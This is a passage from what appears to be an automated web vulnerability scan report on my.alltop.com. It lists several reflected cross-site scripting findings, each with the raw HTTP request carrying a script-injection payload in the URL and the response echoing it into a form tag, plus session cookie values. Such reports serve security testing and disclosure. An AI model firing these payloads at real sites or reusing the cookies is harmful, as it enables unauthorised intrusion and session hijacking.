User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t91c88"><script>alert(1)</script>f32a66e6908/%22ns=%22netsparker(0x00021A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.217. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddacd"><script>alert(1)</script>64ec3f7e85e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%22nsddacd"><script>alert(1)</script>64ec3f7e85e=%22netsparker(0x00021A) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%22nsddacd"><script>alert(1)</script>64ec3f7e85e=%22netsparker(0x00021A)" method="post" accept-charset="utf-8">
...[SNIP]...

1.218. http://my.alltop.com/alpha/t/%22ns=%22netsparker(0x00021A) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%22ns=%22netsparker(0x00021A)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d9b"><script>alert(1)</script>e56999d2e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%22ns=%22netsparker(0x00021A)?a0d9b"><script>alert(1)</script>e56999d2e31=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%22ns=%22netsparker(0x00021A)?a0d9b"><script>alert(1)</script>e56999d2e31=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.219. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 516f4"><script>alert(1)</script>8d2cefd4449 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t516f4"><script>alert(1)</script>8d2cefd4449/%2522ns%253D%2522netsparker%25280x000220%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:20 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t516f4"><script>alert(1)</script>8d2cefd4449/%2522ns%253D%2522netsparker%25280x000220%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.220. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b70"><script>alert(1)</script>f37861f42e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)33b70"><script>alert(1)</script>f37861f42e5 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)33b70"><script>alert(1)</script>f37861f42e5" method="post" accept-charset="utf-8">
...[SNIP]...

1.221. http://my.alltop.com/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65f9b"><script>alert(1)</script>b50c05ba46f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)?65f9b"><script>alert(1)</script>b50c05ba46f=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/t/%2522ns%253D%2522netsparker%25280x000220%2529)?65f9b"><script>alert(1)</script>b50c05ba46f=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.222. http://my.alltop.com/alpha/u [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/u

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2998"><script>alert(1)</script>3a21d4590a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/uf2998"><script>alert(1)</script>3a21d4590a1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/uf2998"><script>alert(1)</script>3a21d4590a1" method="post" accept-charset="utf-8">
...[SNIP]...

1.223. http://my.alltop.com/alpha/u [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/u

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18bd"><script>alert(1)</script>63566903e73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/u?c18bd"><script>alert(1)</script>63566903e73=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/u?c18bd"><script>alert(1)</script>63566903e73=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.224. http://my.alltop.com/alpha/v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/v

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c754e"><script>alert(1)</script>01dd09cadc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/vc754e"><script>alert(1)</script>01dd09cadc3 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/vc754e"><script>alert(1)</script>01dd09cadc3" method="post" accept-charset="utf-8">
...[SNIP]...

1.225. http://my.alltop.com/alpha/v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b10f3"><script>alert(1)</script>49c0e39747a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/v?b10f3"><script>alert(1)</script>49c0e39747a=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
